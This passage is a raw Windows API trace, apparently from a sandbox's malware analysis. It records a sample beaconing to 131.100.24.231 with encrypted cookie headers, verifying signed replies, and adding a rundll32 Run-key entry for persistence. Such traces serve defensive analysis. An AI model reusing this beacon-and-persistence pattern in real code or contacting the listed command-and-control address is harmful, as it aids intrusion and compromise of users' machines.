lpMem=0x5e9278 | out: hHeap=0x530000) returned 1 [0187.425] GetProcessHeap () returned 0x530000 [0187.425] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0187.426] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0187.427] GetProcessHeap () returned 0x530000 [0187.427] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0187.427] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0187.430] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="sZuPkhFvxiruZGnkWSvBZJFMHwMYVGejYGd", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0187.431] GetProcessHeap () returned 0x530000 [0187.431] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0187.431] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0187.431] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0187.431] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0187.432] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: MkmwigRR=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTg7ShOeHr6DQPQAKptliKRzfEvT+Rki5Uu9yC5IjvqCahzx6gm8VuGV+imURRqAfqGaG8OoRH3WkPVYzP2uzj/tUVcOyKoHCG4iHQ73bI/5gMYHEBHRjDV4Y9daRCfWS55+2ll3tC6B1iA==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0188.556] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0188.556] GetProcessHeap () returned 0x530000 [0188.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0188.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x305) returned 1 [0188.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48105, dwNumberOfBytesToRead=0xfcfb, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48105*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0188.556] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0188.556] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0188.556] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0188.556] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0188.556] GetProcessHeap () returned 0x530000 [0188.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0188.557] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0188.557] GetProcessHeap () returned 0x530000 [0188.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8960 [0188.557] GetProcessHeap () returned 0x530000 [0188.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0188.557] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0188.557] GetProcessHeap () returned 0x530000 [0188.557] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8960 | out: hHeap=0x530000) returned 1 [0188.557] GetProcessHeap () returned 0x530000 [0188.558] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0188.558] GetProcessHeap () returned 0x530000 [0188.558] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3ff8 [0188.558] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0188.558] GetProcessHeap () returned 0x530000 [0188.558] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3ff8 | out: hHeap=0x530000) returned 1 [0188.558] GetProcessHeap () returned 0x530000 [0188.558] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0188.558] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0188.558] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0188.558] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0188.558] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0188.558] GetProcessHeap () returned 0x530000 [0188.559] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0188.559] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0188.559] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0188.562] GetProcessHeap () returned 0x530000 [0188.562] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2bee0c8 [0188.562] GetProcessHeap () returned 0x530000 [0188.562] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0188.562] GetProcessHeap () returned 0x530000 [0188.563] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0188.563] GetProcessHeap () returned 0x530000 [0188.563] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0188.563] GetProcessHeap () returned 0x530000 [0188.564] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0188.564] GetProcessHeap () returned 0x530000 [0188.564] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0188.564] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0188.564] GetProcessHeap () returned 0x530000 [0188.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2b5fe68 [0188.564] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",EvGhBl") returned 96 [0188.564] GetProcessHeap () returned 0x530000 [0188.565] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5fe68 | out: hHeap=0x530000) returned 1 [0188.565] GetProcessHeap () returned 0x530000 [0188.565] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0188.565] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0188.565] GetProcessHeap () returned 0x530000 [0188.565] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0188.565] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",EvGhBl") returned 96 [0188.566] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",EvGhBl", cbData=0xc2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",EvGhBl") returned 0x0 [0188.566] RegCloseKey (hKey=0x648) returned 0x0 [0188.566] GetProcessHeap () returned 0x530000 [0188.566] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bee0c8 | out: hHeap=0x530000) returned 1 [0188.566] GetProcessHeap () returned 0x530000 [0188.567] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0188.567] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe77e1) returned 0x102 [0198.592] GetProcessHeap () returned 0x530000 [0198.592] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8960 [0198.592] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0198.592] GetProcessHeap () returned 0x530000 [0198.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8960 | out: hHeap=0x530000) returned 1 [0198.592] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0198.592] GetProcessHeap () returned 0x530000 [0198.592] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8960 [0198.592] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0198.592] GetProcessHeap () returned 0x530000 [0198.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8960 | out: hHeap=0x530000) returned 1 [0198.592] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2b5fe68 [0198.595] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0198.595] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0198.595] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0198.596] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0198.596] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0198.596] FindClose (in: hFindFile=0x2b5fe68 | out: hFindFile=0x2b5fe68) returned 1 [0198.596] GetProcessHeap () returned 0x530000 [0198.596] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0198.596] GetProcessHeap () returned 0x530000 [0198.597] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8960 [0198.597] GetProcessHeap () returned 0x530000 [0198.597] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0198.597] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0198.598] GetProcessHeap () returned 0x530000 [0198.598] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8960 | out: hHeap=0x530000) returned 1 [0198.598] GetProcessHeap () returned 0x530000 [0198.599] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0198.599] GetProcessHeap () returned 0x530000 [0198.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3ff8 [0198.599] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0198.599] GetProcessHeap () returned 0x530000 [0198.599] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3ff8 | out: hHeap=0x530000) returned 1 [0198.599] GetProcessHeap () returned 0x530000 [0198.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0198.599] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0198.600] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0198.600] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0198.600] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0198.600] GetProcessHeap () returned 0x530000 [0198.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0198.600] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0198.600] GetProcessHeap () returned 0x530000 [0198.600] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0198.600] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0198.600] GetProcessHeap () returned 0x530000 [0198.600] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0198.600] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0198.600] GetProcessHeap () returned 0x530000 [0198.600] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf0) returned 0x5e6360 [0198.601] GetProcessHeap () returned 0x530000 [0198.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0198.601] GetProcessHeap () returned 0x530000 [0198.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0198.601] CryptBinaryToStringW (in: pbBinary=0x5e6360, cbBinary=0xf0, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0198.601] GetProcessHeap () returned 0x530000 [0198.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x282) returned 0x2b65430 [0198.601] CryptBinaryToStringW (in: pbBinary=0x5e6360, cbBinary=0xf0, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTrWb12NFb/Sqn7t9AGZIZ9FzivqgqubQwEvFxQWARTi1nZgZoTcjDFoKgyF6J+TIc/64IWyQOiKvT0HEuYUeuW4k8mzj5IItZNG1BycKEUWj", pcchString=0x2cf504) returned 1 [0198.602] GetProcessHeap () returned 0x530000 [0198.602] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0198.602] GetProcessHeap () returned 0x530000 [0198.602] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa4048 [0198.602] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: xwFtrsNnmkQV=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTrWb12NFb/Sqn7t9AGZIZ9FzivqgqubQwEvFxQWARTi1nZgZoTcjDFoKgyF6J+TIc/64IWyQOiKvT0HEuYUeuW4k8mzj5IItZNG1BycKEUWj\r\n") returned 343 [0198.602] GetProcessHeap () returned 0x530000 [0198.602] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa4048 | out: hHeap=0x530000) returned 1 [0198.602] GetProcessHeap () returned 0x530000 [0198.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0198.603] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0198.603] GetProcessHeap () returned 0x530000 [0198.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0198.603] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0198.605] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="cbdEcXhDUxjTynjcAbsoCaeAOPEKG", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0198.606] GetProcessHeap () returned 0x530000 [0198.606] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0198.606] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0198.606] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0198.606] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0198.606] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: xwFtrsNnmkQV=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTrWb12NFb/Sqn7t9AGZIZ9FzivqgqubQwEvFxQWARTi1nZgZoTcjDFoKgyF6J+TIc/64IWyQOiKvT0HEuYUeuW4k8mzj5IItZNG1BycKEUWj\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0199.740] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0199.740] GetProcessHeap () returned 0x530000 [0199.740] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0199.741] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x3ca) returned 1 [0199.741] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b481ca, dwNumberOfBytesToRead=0xfc36, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b481ca*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0199.741] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0199.741] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0199.741] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0199.741] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0199.741] GetProcessHeap () returned 0x530000 [0199.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0199.741] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0199.741] GetProcessHeap () returned 0x530000 [0199.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0199.741] GetProcessHeap () returned 0x530000 [0199.741] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0199.742] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0199.742] GetProcessHeap () returned 0x530000 [0199.742] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0199.742] GetProcessHeap () returned 0x530000 [0199.743] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0199.743] GetProcessHeap () returned 0x530000 [0199.743] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa2d10 [0199.743] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0199.743] GetProcessHeap () returned 0x530000 [0199.743] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa2d10 | out: hHeap=0x530000) returned 1 [0199.743] GetProcessHeap () returned 0x530000 [0199.743] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0199.743] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0199.744] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0199.744] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0199.744] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0199.744] GetProcessHeap () returned 0x530000 [0199.744] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0199.744] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0199.744] 